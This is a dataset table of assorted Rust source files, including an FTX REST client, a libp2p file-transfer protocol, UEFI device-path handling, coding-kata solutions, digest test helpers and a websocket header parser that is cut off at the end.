blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 5
140
| path
stringlengths 5
183
| src_encoding
stringclasses 6
values | length_bytes
int64 12
5.32M
| score
float64 2.52
4.94
| int_score
int64 3
5
| detected_licenses
listlengths 0
47
| license_type
stringclasses 2
values | text
stringlengths 12
5.32M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
d74fa7168aff61583ae1368cafa38da203a5f148
|
Rust
|
hooops/crypto-crawler-rs
|
/crypto-rest-client/src/exchanges/ftx.rs
|
UTF-8
| 1,432 | 2.75 | 3 |
[
"Apache-2.0"
] |
permissive
|
use super::utils::http_get;
use crate::error::Result;
use std::collections::BTreeMap;
const BASE_URL: &str = "https://ftx.com/api";
/// The RESTful client for FTX.
///
/// FTX has Spot, LinearFuture, LinearSwap, Option, Move and BVOL markets.
///
/// * RESTful API doc: <https://docs.ftx.com/?python#rest-api>
/// * Trading at <https://ftx.com/markets>
/// * Rate Limits: <https://docs.ftx.com/?python#rate-limits>
/// * Non-order placement requests do not count towards rate limits.
/// * Rate limits are tiered by account trading volumes.
pub struct FtxRestClient {
_api_key: Option<String>,
_api_secret: Option<String>,
}
impl FtxRestClient {
pub fn new(api_key: Option<String>, api_secret: Option<String>) -> Self {
FtxRestClient {
_api_key: api_key,
_api_secret: api_secret,
}
}
/// Get the latest Level2 snapshot of orderbook.
///
/// Top 100 bids and asks are returned.
///
/// For example: <https://ftx.com/api/markets/BTC-PERP/orderbook?depth=100>,
// <https://ftx.com/api/markets/BTC/USD/orderbook?depth=100>
pub fn fetch_l2_snapshot(symbol: &str) -> Result<String> {
gen_api!(format!("/markets/{}/orderbook?depth=100", symbol))
}
/// Get open interest.
///
/// For example:
/// - <https://ftx.com/api/futures>
pub fn fetch_open_interest() -> Result<String> {
gen_api!("/futures")
}
}
| true |
83af5dc9ca017d01cf46692a0afea426a3bf5afd
|
Rust
|
ccin2p3/actiondb
|
/src/matcher/pattern/pattern.rs
|
UTF-8
| 1,678 | 2.765625 | 3 |
[] |
no_license
|
use uuid::Uuid;
use serde::json;
use serde;
use matcher::trie::node::{CompiledPattern, TokenType};
use super::testmessage::TestMessage;
use std::borrow::Borrow;
#[derive(Clone, Debug)]
pub struct Pattern {
name: Option<String>,
uuid: Uuid,
pattern: CompiledPattern,
test_messages: Option<Vec<TestMessage>>
}
impl Pattern {
pub fn with_uuid(uuid: Uuid) -> Pattern {
Pattern{
uuid: uuid,
name: None,
pattern: Vec::new(),
test_messages: None
}
}
pub fn new(name: Option<String>, uuid: Uuid, pattern: CompiledPattern, test_messages: Option<Vec<TestMessage>>) -> Pattern {
Pattern{
uuid: uuid,
name: name,
pattern: pattern,
test_messages: test_messages
}
}
pub fn with_random_uuid() -> Pattern {
Pattern::with_uuid(Uuid::new_v4())
}
pub fn name(&self) -> Option<&str> {
self.name.as_ref().map(|x| x.borrow())
}
pub fn uuid(&self) -> &Uuid {
&self.uuid
}
pub fn pattern(&self) -> &CompiledPattern {
&self.pattern
}
pub fn from_json(doc: &str) -> Result<Pattern, serde::json::error::Error> {
json::from_str::<Pattern>(doc)
}
pub fn set_pattern(&mut self, pattern: CompiledPattern) {
self.pattern = pattern;
}
pub fn pop_first_token(&mut self) -> TokenType {
self.pattern.remove(0)
}
pub fn has_more_tokens(&self) -> bool {
self.pattern.is_empty()
}
pub fn pop_test_message(&mut self) -> Option<TestMessage> {
self.test_messages.as_mut().map_or(None, |x| x.pop())
}
}
| true |
b43f69c5635b84b16052bc53c5cfacc8308ba751
|
Rust
|
igorline/substrate-treasury-demo
|
/node/src/members_config.rs
|
UTF-8
| 713 | 2.671875 | 3 |
[
"Unlicense"
] |
permissive
|
use serde::Deserialize;
use serde_json::Result;
use sp_core::crypto::{AccountId32, Ss58Codec};
#[derive(Deserialize)]
struct Member {
/// SS58 Encoded public key
address: String,
}
fn parse_members_json() -> Result<Vec<Member>> {
let data = include_str!("../../user_accounts.json");
serde_json::from_str(data)
}
pub fn decode_address(address: String) -> AccountId32 {
AccountId32::from_ss58check(address.as_ref()).expect("failed to decode account id")
}
pub fn initial_members() -> Vec<AccountId32> {
let members = parse_members_json().expect("failed parsing members data");
members
.into_iter()
.map(|member| decode_address(member.address))
.collect()
}
| true |
7a85220def219477b148be5b99d3e0919fbe320b
|
Rust
|
sireliah/p2pshare
|
/src/protocol.rs
|
UTF-8
| 6,214 | 2.671875 | 3 |
[] |
no_license
|
use async_std::fs::File as AsyncFile;
use async_std::io as asyncio;
use crypto::digest::Digest;
use crypto::sha1::Sha1;
use futures::prelude::*;
use libp2p::core::{InboundUpgrade, OutboundUpgrade, UpgradeInfo};
use std::fs::File;
use std::io::{BufReader, Read};
use std::time::{Instant, SystemTime, UNIX_EPOCH};
use std::{io, iter, pin::Pin};
const CHUNK_SIZE: usize = 4096;
pub struct FileToSend {
pub name: String,
pub path: String,
}
#[derive(Clone, Debug)]
pub enum ProtocolEvent {
Received {
name: String,
path: String,
hash: String,
size_bytes: usize,
},
Sent,
}
#[derive(Clone, Debug, Default)]
pub struct TransferPayload {
pub name: String,
pub path: String,
pub hash: String,
pub size_bytes: usize,
}
impl TransferPayload {
pub fn new(name: String, path: String, hash: String, size_bytes: usize) -> TransferPayload {
TransferPayload {
name,
path,
hash,
size_bytes,
}
}
pub fn check_file(&self) -> Result<(), io::Error> {
let mut contents = vec![];
let mut file = BufReader::new(File::open(&self.path)?);
file.read_to_end(&mut contents).expect("Cannot read file");
let hash_from_disk = hash_contents(&mut contents);
if hash_from_disk != self.hash {
Err(io::Error::new(
io::ErrorKind::InvalidData,
"File corrupted!",
))
} else {
Ok(())
}
}
}
impl UpgradeInfo for TransferPayload {
type Info = &'static str;
type InfoIter = iter::Once<Self::Info>;
fn protocol_info(&self) -> Self::InfoIter {
std::iter::once("/transfer/1.0")
}
}
fn now() -> Instant {
Instant::now()
}
fn add_row(value: &str) -> Vec<u8> {
format!("{}\n", value).into_bytes()
}
fn hash_contents(contents: &Vec<u8>) -> String {
let mut hasher = Sha1::new();
hasher.input(&contents);
hasher.result_str()
}
async fn read_socket(
socket: impl AsyncRead + AsyncWrite + Send + Unpin,
) -> Result<TransferPayload, io::Error> {
let mut reader = asyncio::BufReader::new(socket);
let mut payloads: Vec<u8> = vec![];
let mut name: String = "".into();
let mut hash: String = "".into();
reader.read_line(&mut name).await?;
reader.read_line(&mut hash).await?;
let (name, hash) = (name.trim(), hash.trim());
println!("Name: {}, Hash: {}", name, hash);
let now = SystemTime::now();
let timestamp = now.duration_since(UNIX_EPOCH).expect("Time failed");
let path = format!("/tmp/files/{}_{}", timestamp.as_secs(), name);
let mut file = asyncio::BufWriter::new(AsyncFile::create(&path).await?);
let mut counter: usize = 0;
loop {
let mut buff = vec![0u8; CHUNK_SIZE];
match reader.read(&mut buff).await {
Ok(n) => {
if n > 0 {
payloads.extend(&buff[..n]);
counter += n;
if payloads.len() >= (CHUNK_SIZE * 256) {
file.write_all(&payloads)
.await
.expect("Writing file failed");
file.flush().await?;
payloads.clear();
}
} else {
file.write_all(&payloads).await.expect("Writing file failed");
file.flush().await?;
payloads.clear();
break;
}
}
Err(e) => panic!("Failed reading the socket {:?}", e),
}
}
let event = TransferPayload::new(
name.to_string(),
hash.to_string(),
path.to_string(),
counter,
);
println!("Name: {}, Read {:?} bytes", name, counter);
Ok(event)
}
impl<TSocket> InboundUpgrade<TSocket> for TransferPayload
where
TSocket: AsyncRead + AsyncWrite + Send + Unpin + 'static,
{
type Output = TransferPayload;
type Error = asyncio::Error;
type Future = Pin<Box<dyn Future<Output = Result<Self::Output, Self::Error>> + Send>>;
fn upgrade_inbound(self, socket: TSocket, _: Self::Info) -> Self::Future {
Box::pin(async move {
println!("Upgrade inbound");
let start = now();
let event = read_socket(socket).await?;
println!("Finished {:?} ms", start.elapsed().as_millis());
Ok(event)
})
}
}
impl<TSocket> OutboundUpgrade<TSocket> for TransferPayload
where
TSocket: AsyncRead + AsyncWrite + Send + Unpin + 'static,
{
type Output = ();
type Error = asyncio::Error;
type Future = Pin<Box<dyn Future<Output = Result<Self::Output, Self::Error>> + Send>>;
fn upgrade_outbound(self, mut socket: TSocket, _: Self::Info) -> Self::Future {
Box::pin(async move {
println!("Upgrade outbound");
let start = now();
println!("Name: {:?}, Path: {:?}", self.name, self.path);
let file = AsyncFile::open(self.path).await.expect("File missing");
let mut buff = asyncio::BufReader::new(&file);
let mut contents = vec![];
buff.read_to_end(&mut contents)
.await
.expect("Cannot read file");
let hash = hash_contents(&contents);
let name = add_row(&self.name);
let checksum = add_row(&hash);
socket.write(&name).await.expect("Writing name failed");
socket.write(&checksum).await?;
socket.write_all(&contents).await.expect("Writing failed");
socket.close().await.expect("Failed to close socket");
println!("Finished {:?} ms", start.elapsed().as_millis());
Ok(())
})
}
}
impl From<()> for ProtocolEvent {
fn from(_: ()) -> Self {
ProtocolEvent::Sent
}
}
impl From<TransferPayload> for ProtocolEvent {
fn from(transfer: TransferPayload) -> Self {
ProtocolEvent::Received {
name: transfer.name,
path: transfer.path,
hash: transfer.hash,
size_bytes: transfer.size_bytes,
}
}
}
| true |
5bd836e88bef2a393f0ed51a74a6b3f22dcbfbca
|
Rust
|
toddmath/exercism-rust
|
/queen-attack/src/lib.rs
|
UTF-8
| 692 | 3.40625 | 3 |
[] |
no_license
|
#[derive(Debug)]
pub struct ChessPosition(isize, isize);
#[derive(Debug)]
pub struct Queen {
row: isize,
col: isize,
}
impl ChessPosition {
pub fn new(rank: i32, file: i32) -> Option<Self> {
match (rank, file) {
(0..=7, 0..=7) => Some(Self(rank as isize, file as isize)),
_ => None,
}
}
}
impl Queen {
pub fn new(position: ChessPosition) -> Self {
Self {
row: position.0,
col: position.1,
}
}
pub fn can_attack(&self, other: &Queen) -> bool {
let dx = self.row - other.row;
let dy = self.col - other.col;
dx == 0 || dy == 0 || dx.abs() == dy.abs()
}
}
| true |
b8e4385a76f0e27f1edd9233feacdab067859d40
|
Rust
|
alexanderkjall/adventofcode2020
|
/src/day6.rs
|
UTF-8
| 1,638 | 3.40625 | 3 |
[] |
no_license
|
use std::collections::HashSet;
pub fn run() -> Result<(String, String), anyhow::Error> {
let input: String = std::fs::read_to_string("res/day6-input")?.parse()?;
let result_1 = sum_unique(&input);
let result_2 = sum_and(&input);
Ok((format!("{}", result_1), format!("{}", result_2)))
}
fn sum_unique(input: &str) -> usize {
let groups: Vec<&str> = input.split("\n\n").collect();
groups
.iter()
.map(|s| {
let chars: HashSet<char> = s.chars().filter(|c| *c != ' ' && *c != '\n').collect();
chars.len()
})
.sum()
}
fn sum_and(input: &str) -> usize {
let groups: Vec<&str> = input.trim().split("\n\n").collect();
groups
.iter()
.map(|s| {
let lines = s.split('\n');
let initial_state: HashSet<char> = "abcdefghijklmnopqrstuvwxyz".chars().collect();
let intersect = lines
.map(|l| l.chars().collect::<HashSet<char>>())
.fold(initial_state, |i, s| i.intersection(&s).copied().collect());
intersect.len()
})
.sum()
}
#[test]
fn test_sum_unique() {
let input = "abc
a
b
c
ab
ac
a
a
a
a
b";
assert_eq!(11, sum_unique(input));
}
#[test]
fn test_sum_and() {
let input = "abc
a
b
c
ab
ac
a
a
a
a
b
";
assert_eq!(6, sum_and(input));
}
#[test]
fn test_sum_and_1() {
let input = "abc";
assert_eq!(3, sum_and(input));
}
#[test]
fn test_sum_and_2() {
let input = "a
b
c";
assert_eq!(0, sum_and(input));
}
#[test]
fn test_sum_and_3() {
let input = "ab
ac";
assert_eq!(1, sum_and(input));
}
| true |
8461949bc7687ac905cd153e56276d5c59e41e27
|
Rust
|
hwchen/lemurdb
|
/src/bin/test_csv.rs
|
UTF-8
| 3,316 | 2.765625 | 3 |
[] |
no_license
|
#![recursion_limit = "1024"]
#[macro_use]
extern crate error_chain;
extern crate lemurdb;
use lemurdb::{Schema, DataType};
use lemurdb::executor::DbIterator;
use lemurdb::executor::io::CsvSource;
use lemurdb::executor::simplesort::SortOrder;
use lemurdb::executor::aggregate::{AggregateType};
mod error {
use lemurdb;
error_chain!{
foreign_links {
Io(::std::io::Error);
}
links {
Lemur(lemurdb::error::Error, lemurdb::error::ErrorKind);
}
}
}
use error::*;
fn main() {
if let Err(ref err) = run() {
println!("error: {}", err);
for e in err.iter().skip(1) {
println!(" cause by: {}", e);
}
if let Some(backtrace) = err.backtrace() {
println!("backtrace: {:?}", backtrace);
}
::std::process::exit(1);
}
}
fn run() -> Result<()> {
use lemurdb::DataType::*;
let rating_schema = Schema{
column_names: vec!["userId".to_owned(), "movieId".to_owned(), "rating".to_owned(), "timestamp".to_owned()],
column_types: vec![Integer, Integer, Float, Integer],
};
let movie_schema = Schema {
column_names: vec!["movieId".to_owned(), "title".to_owned(), "genres".to_owned()],
column_types: vec![Integer, Text(255), Text(255)],
};
// Test sort and limit
// let mut query = CsvSource::new("ratings.csv".to_owned(), schema.clone())
// .simplesort(1, DataType::Integer, SortOrder::Ascending)
// .limit(50);
//
// while let Some(record) = query.next() {
// println!("{:?}", record.to_string(&schema));
// }
// test aggregate
// let final_schema = Schema{
// column_names: vec!["movie_id".to_owned(), "rating count".to_owned()],
// column_types: vec![Integer, Integer],
// };
// let mut query = CsvSource::new("ratings.csv".to_owned(), schema.clone())
// .simplesort(1, DataType::Integer, SortOrder::Ascending)
// .aggregate(AggregateType::Count, 2, DataType::Float, Some(1));
//
// while let Some(record) = query.next() {
// println!("{:?}", record.to_string(&final_schema));
// }
// test join
let joined_schema = Schema {
column_names: vec![
"userId".to_owned(),
"movieId".to_owned(),
"rating".to_owned(),
"timestamp".to_owned(),
"movieId".to_owned(),
"title".to_owned(),
"genres".to_owned()
],
column_types: vec![
Integer,
Integer,
Float,
Integer,
Integer,
Text(255),
Text(255),
],
};
let agg_schema = Schema{
column_names: vec!["title".to_owned(), "rating count".to_owned()],
column_types: vec![Text(255), Integer],
};
let movies = CsvSource::new("test_data/test_movies.csv".to_owned(), movie_schema);
let mut query = CsvSource::new("test_data/test_ratings.csv".to_owned(), rating_schema)
.nested_loops_join(movies,1, 0)
.simplesort(5, DataType::Text(255), SortOrder::Ascending)
.aggregate(AggregateType::Count, 2, DataType::Float, Some(5));
while let Some(record) = query.next() {
println!("{:?}", record.to_string(&agg_schema));
}
Ok(())
}
| true |
c444b6c7987608711e169ce8ae921f0a8a913c23
|
Rust
|
alex-dukhno/rust-tdd-katas
|
/persistent_list/src/day_03.rs
|
UTF-8
| 1,492 | 3.65625 | 4 |
[
"MIT"
] |
permissive
|
use std::rc::Rc;
type Link = Option<Rc<Node>>;
#[derive(PartialEq, Debug)]
struct Node {
item: i32,
next: Link,
}
impl Node {
fn new(item: i32, next: Link) -> Link {
Some(Rc::new(Node { item, next }))
}
}
#[derive(PartialEq, Debug)]
pub struct List {
head: Link,
}
impl List {
pub(crate) fn empty() -> List {
List { head: None }
}
pub(crate) fn head(&self) -> Option<&i32> {
self.head.as_ref().map(|node| &node.item)
}
pub(crate) fn tail(&self) -> List {
List {
head: self.head.as_ref().and_then(|node| node.next.clone()),
}
}
pub(crate) fn prepend(&self, item: i32) -> List {
List {
head: Node::new(item, self.head.clone()),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn empty_list_head() {
let empty = List::empty();
assert_eq!(empty.head(), None);
}
#[test]
fn empty_list_tail() {
let empty = List::empty();
assert_eq!(empty.tail(), List::empty());
}
#[test]
fn prepend_single_item() {
let list = List::empty().prepend(1);
assert_eq!(list.head(), Some(&1));
assert_eq!(list.tail(), List::empty());
}
#[test]
fn prepend_multiple_items() {
let list = List::empty().prepend(1).prepend(2).prepend(3);
assert_eq!(list.head(), Some(&3));
assert_eq!(list.tail(), List::empty().prepend(1).prepend(2));
}
}
| true |
fc2a01bdcf5d71a932a2f5349b75d932049ce00d
|
Rust
|
redox-os/bootloader
|
/src/os/uefi/device.rs
|
UTF-8
| 14,695 | 2.609375 | 3 |
[
"MIT"
] |
permissive
|
use alloc::{
string::String,
vec::Vec,
};
use core::{
fmt::Write,
mem,
ptr,
slice,
};
use uefi::{
Handle,
device::{
DevicePath,
DevicePathType,
DevicePathHardwareType,
DevicePathAcpiType,
DevicePathMessagingType,
DevicePathMediaType,
DevicePathBbsType,
DevicePathEndType,
},
guid::Guid,
};
use uefi_std::{
loaded_image::LoadedImage,
proto::Protocol,
};
use super::disk::DiskEfi;
#[derive(Debug)]
enum DevicePathRelation {
This,
Parent(usize),
Child(usize),
None,
}
fn device_path_relation(a_path: &DevicePath, b_path: &DevicePath) -> DevicePathRelation {
let mut a_iter = DevicePathIter::new(a_path);
let mut b_iter = DevicePathIter::new(b_path);
loop {
match (a_iter.next(), b_iter.next()) {
(None, None) => return DevicePathRelation::This,
(None, Some(_)) => return DevicePathRelation::Parent(b_iter.count()),
(Some(_), None) => return DevicePathRelation::Child(a_iter.count()),
(Some((a_node, a_data)), Some((b_node, b_data))) => {
if a_node.Type != b_node.Type {
return DevicePathRelation::None;
}
if a_node.SubType != b_node.SubType {
return DevicePathRelation::None;
}
if a_data != b_data {
return DevicePathRelation::None;
}
}
}
}
}
pub struct DiskDevice {
pub handle: Handle,
pub disk: DiskEfi,
pub device_path: DevicePathProtocol,
}
pub fn disk_device_priority() -> Vec<DiskDevice> {
// Get the handle of the partition this program was loaded from, which should be the ESP
let esp_handle = match LoadedImage::handle_protocol(std::handle()) {
Ok(loaded_image) => loaded_image.0.DeviceHandle,
Err(err) => {
log::warn!("Failed to find LoadedImage protocol: {:?}", err);
return Vec::new();
}
};
// Get the device path of the ESP
let esp_device_path = match DevicePathProtocol::handle_protocol(esp_handle) {
Ok(ok) => ok,
Err(err) => {
log::warn!("Failed to find device path protocol on {:?}: {:?}", esp_handle, err);
return Vec::new();
}
};
// Get all block I/O handles along with their block I/O implementations and device paths
let handles = match DiskEfi::locate_handle() {
Ok(ok) => ok,
Err(err) => {
log::warn!("Failed to find block I/O handles: {:?}", err);
Vec::new()
}
};
let mut devices = Vec::with_capacity(handles.len());
for handle in handles {
let disk = match DiskEfi::handle_protocol(handle) {
Ok(ok) => ok,
Err(err) => {
log::warn!("Failed to find block I/O protocol on {:?}: {:?}", handle, err);
continue;
}
};
let device_path = match DevicePathProtocol::handle_protocol(handle) {
Ok(ok) => ok,
Err(err) => {
log::warn!("Failed to find device path protocol on {:?}: {:?}", handle, err);
continue;
}
};
devices.push(DiskDevice {
handle,
disk,
device_path,
});
}
// Find possible boot disks
let mut boot_disks = Vec::with_capacity(1);
{
let mut i = 0;
while i < devices.len() {
match device_path_relation(devices[i].device_path.0, esp_device_path.0) {
DevicePathRelation::Parent(0) => {
boot_disks.push(devices.remove(i));
continue;
},
_ => (),
}
i += 1;
}
}
// Find all children of possible boot devices
let mut priority = Vec::with_capacity(devices.capacity());
for boot_disk in boot_disks {
let mut i = 0;
while i < devices.len() {
// Only prioritize non-ESP devices
if devices[i].handle != esp_handle {
match device_path_relation(devices[i].device_path.0, boot_disk.device_path.0) {
DevicePathRelation::Child(0) => {
priority.push(devices.remove(i));
continue;
},
_ => (),
}
}
i += 1;
}
priority.push(boot_disk);
}
// Add any remaining devices
priority.extend(devices);
priority
}
#[repr(packed)]
#[allow(dead_code)]
struct DevicePathHarddrive {
partition_number: u32,
partition_start: u64,
partition_size: u64,
partition_signature: [u8; 16],
partition_format: u8,
signature_type: u8,
}
pub fn device_path_to_string(device_path: &DevicePath) -> String {
let mut s = String::new();
for (node, node_data) in DevicePathIter::new(device_path) {
let read_u16 = |i: usize| -> u16 {
(node_data[i] as u16) |
(node_data[i + 1] as u16) << 8
};
let read_u32 = |i: usize| -> u32 {
(node_data[i] as u32) |
(node_data[i + 1] as u32) << 8 |
(node_data[i + 2] as u32) << 16 |
(node_data[i + 3] as u32) << 24
};
if ! s.is_empty() {
s.push('/');
}
let write_result = match DevicePathType::try_from(node.Type) {
Ok(path_type) => match path_type {
DevicePathType::Hardware => match DevicePathHardwareType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
DevicePathHardwareType::Pci if node_data.len() == 2 => {
let func = node_data[0];
let dev = node_data[1];
write!(s, "Pci(0x{:X},0x{:X})", dev, func)
},
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
DevicePathType::Acpi => match DevicePathAcpiType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
DevicePathAcpiType::Acpi if node_data.len() == 8 => {
let hid = read_u32(0);
let uid = read_u32(4);
if hid & 0xFFFF == 0x41D0 {
write!(s, "Acpi(PNP{:04X},0x{:X})", hid >> 16, uid)
} else {
write!(s, "Acpi(0x{:08X},0x{:X})", hid, uid)
}
},
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
DevicePathType::Messaging => match DevicePathMessagingType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
DevicePathMessagingType::Sata if node_data.len() == 6 => {
let hba_port = read_u16(0);
let multiplier_port = read_u16(2);
let logical_unit = read_u16(4);
if multiplier_port & (1 << 15) != 0 {
write!(s, "Sata(0x{:X},0x{:X})", hba_port, logical_unit)
} else {
write!(s, "Sata(0x{:X},0x{:X},0x{:X})", hba_port, multiplier_port, logical_unit)
}
},
DevicePathMessagingType::Usb if node_data.len() == 2 => {
let port = node_data[0];
let iface = node_data[1];
write!(s, "Usb(0x{:X},0x{:X})", port, iface)
},
DevicePathMessagingType::Nvme if node_data.len() == 12 => {
let nsid = read_u32(0);
let eui = &node_data[4..];
if eui == &[0, 0, 0, 0, 0, 0, 0, 0] {
write!(s, "NVMe(0x{:X})", nsid)
} else {
write!(
s,
"NVMe(0x{:X},{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X}-{:02X})",
nsid,
eui[0],
eui[1],
eui[2],
eui[3],
eui[4],
eui[5],
eui[6],
eui[7],
)
}
},
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
DevicePathType::Media => match DevicePathMediaType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
DevicePathMediaType::Harddrive if node_data.len() == mem::size_of::<DevicePathHarddrive>() => {
let harddrive = unsafe { ptr::read(node_data.as_ptr() as *const DevicePathHarddrive) };
match harddrive.signature_type {
1 => {
let id = unsafe { ptr::read(harddrive.partition_signature.as_ptr() as *const u32) };
write!(s, "HD(0x{:X},MBR,0x{:X})", harddrive.partition_number, id)
},
2 => {
let guid = unsafe { ptr::read(harddrive.partition_signature.as_ptr() as *const Guid) };
write!(
s,
"HD(0x{:X},GPT,{:08X}-{:04X}-{:04X}-{:02X}{:02X}-{:02X}{:02X}{:02X}{:02X}{:02X}{:02X})",
harddrive.partition_number,
guid.0,
guid.1,
guid.2,
guid.3[0],
guid.3[1],
guid.3[2],
guid.3[3],
guid.3[4],
guid.3[5],
guid.3[6],
guid.3[7],
)
},
_ => {
write!(s, "HD(0x{:X},0x{:X},{:X?})", harddrive.partition_number, harddrive.signature_type, harddrive.partition_signature)
}
}
},
DevicePathMediaType::Filepath => {
for chunk in node_data.chunks_exact(2) {
let data = (chunk[0] as u16) | (chunk[1] as u16) << 8;
match unsafe { char::from_u32_unchecked(data as u32) } {
'\\' => s.push('/'),
c => s.push(c),
}
}
Ok(())
},
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
DevicePathType::Bbs => match DevicePathBbsType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
DevicePathType::End => match DevicePathEndType::try_from(node.SubType) {
Ok(sub_type) => match sub_type {
_ => write!(s, "{:?} {:?} {:X?}", path_type, sub_type, node_data),
}
Err(()) => write!(s, "{:?} 0x{:02X} {:X?}", path_type, node.SubType, node_data),
},
},
Err(()) => {
write!(s, "0x{:02X} 0x{:02X} {:X?}", node.Type, node.SubType, node_data)
},
};
}
s
}
pub struct DevicePathProtocol(pub &'static mut DevicePath);
impl Protocol<DevicePath> for DevicePathProtocol {
fn guid() -> Guid {
uefi::guid::DEVICE_PATH_GUID
}
fn new(inner: &'static mut DevicePath) -> Self {
Self(inner)
}
}
pub struct LoadedImageDevicePathProtocol(pub &'static mut DevicePath);
impl Protocol<DevicePath> for LoadedImageDevicePathProtocol {
fn guid() -> Guid {
uefi::guid::LOADED_IMAGE_DEVICE_PATH_GUID
}
fn new(inner: &'static mut DevicePath) -> Self {
Self(inner)
}
}
pub struct DevicePathIter<'a> {
device_path: &'a DevicePath,
node_ptr: *const DevicePath,
}
impl<'a> DevicePathIter<'a> {
pub fn new(device_path: &'a DevicePath) -> Self {
Self {
device_path,
node_ptr: device_path as *const DevicePath,
}
}
}
impl<'a> Iterator for DevicePathIter<'a> {
type Item = (&'a DevicePath, &'a [u8]);
fn next(&mut self) -> Option<Self::Item> {
let node = unsafe { &*self.node_ptr };
if node.Type == DevicePathType::End as u8 {
return None;
}
let node_data = unsafe {
slice::from_raw_parts(
self.node_ptr.add(1) as *mut u8,
node.Length.saturating_sub(4) as usize,
)
};
self.node_ptr = (self.node_ptr as usize + node.Length as usize) as *const DevicePath;
Some((node, node_data))
}
}
| true |
1cc850929387a54746e3c62bf259fec8961127e5
|
Rust
|
digitalbitbox/bitbox02-firmware
|
/src/rust/vendor/digest/src/dev/fixed.rs
|
UTF-8
| 2,021 | 2.90625 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
use crate::{Digest, FixedOutput, FixedOutputReset, HashMarker, Update};
use core::fmt::Debug;
/// Fixed-output resettable digest test via the `Digest` trait
pub fn fixed_reset_test<D>(input: &[u8], output: &[u8]) -> Option<&'static str>
where
D: FixedOutputReset + Debug + Clone + Default + Update + HashMarker,
{
let mut hasher = D::new();
// Test that it works when accepting the message all at once
hasher.update(input);
let mut hasher2 = hasher.clone();
if hasher.finalize()[..] != output[..] {
return Some("whole message");
}
// Test if reset works correctly
hasher2.reset();
hasher2.update(input);
if hasher2.finalize_reset()[..] != output[..] {
return Some("whole message after reset");
}
// Test that it works when accepting the message in chunks
for n in 1..core::cmp::min(17, input.len()) {
let mut hasher = D::new();
for chunk in input.chunks(n) {
hasher.update(chunk);
hasher2.update(chunk);
}
if hasher.finalize()[..] != output[..] {
return Some("message in chunks");
}
if hasher2.finalize_reset()[..] != output[..] {
return Some("message in chunks");
}
}
None
}
/// Variable-output resettable digest test
pub fn fixed_test<D>(input: &[u8], output: &[u8]) -> Option<&'static str>
where
D: FixedOutput + Default + Debug + Clone,
{
let mut hasher = D::default();
// Test that it works when accepting the message all at once
hasher.update(input);
if hasher.finalize_fixed()[..] != output[..] {
return Some("whole message");
}
// Test that it works when accepting the message in chunks
for n in 1..core::cmp::min(17, input.len()) {
let mut hasher = D::default();
for chunk in input.chunks(n) {
hasher.update(chunk);
}
if hasher.finalize_fixed()[..] != output[..] {
return Some("message in chunks");
}
}
None
}
| true |
58fe0d91f798559c199af00f6602840b69a9d9ef
|
Rust
|
wyyerd/stripe-rs
|
/src/resources/token_ext.rs
|
UTF-8
| 811 | 3.46875 | 3 |
[
"MIT",
"Apache-2.0"
] |
permissive
|
use serde_derive::{Deserialize, Serialize};
/// An enum representing the possible values of an `Token`'s `type` field.
#[derive(Copy, Clone, Debug, Deserialize, Serialize, Eq, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum TokenType {
Account,
BankAccount,
Card,
Pii,
}
impl TokenType {
pub fn as_str(self) -> &'static str {
match self {
TokenType::Account => "account",
TokenType::BankAccount => "bank_account",
TokenType::Card => "card",
TokenType::Pii => "pii",
}
}
}
impl AsRef<str> for TokenType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
impl std::fmt::Display for TokenType {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
self.as_str().fmt(f)
}
}
| true |
12834eb3c83daf264ed88962c6629ce3da66307e
|
Rust
|
Muqito/ws-lite
|
/src/accept/ws_headers.rs
|
UTF-8
| 7,058 | 2.734375 | 3 |
[] |
no_license
|
#[derive(Debug)]
pub struct WsHeaders<'a> {
upgrade: Option<&'a str>,
websocket_key: Option<&'a str>,
}
impl<'a> WsHeaders<'a> {
pub fn new() -> Self {
Self {
upgrade: None,
websocket_key: None,
}
}
pub fn get(&self, key: &str) -> Option<&'a str> {
match key {
"Upgrade" => self.get_upgrade(),
"Sec-WebSocket-Key" => self.get_key(),
_ => None,
}
}
pub fn get_upgrade(&self) -> Option<&'a str> {
self.upgrade
}
pub fn get_key(&self) -> Option<&'a str> {
self.websocket_key
}
pub fn is_websocket(&self) -> bool {
matches!(self.upgrade, Some("websocket"))
}
pub fn has_key(&self) -> bool {
matches!(self.upgrade, Some(_))
}
}
fn get_ws_headers_from_str<'a>(input: &'a str) -> WsHeaders<'a> {
let mut ws_headers = WsHeaders::new();
input.split("\r\n").for_each(|row| {
let mut splits = row.splitn(2, ": ");
match (splits.next(), splits.next()) {
(Some("Upgrade"), value) => ws_headers.upgrade = value,
(Some("Sec-WebSocket-Key"), value) => ws_headers.websocket_key = value,
_ => {}
}
});
ws_headers
}
impl<'a> From<&'a str> for WsHeaders<'a> {
fn from(input: &'a str) -> Self {
get_ws_headers_from_str(input)
}
}
impl<'a> From<&'a std::borrow::Cow<'a, str>> for WsHeaders<'a> {
fn from(input: &'a std::borrow::Cow<'a, str>) -> WsHeaders<'a> {
get_ws_headers_from_str(&input)
}
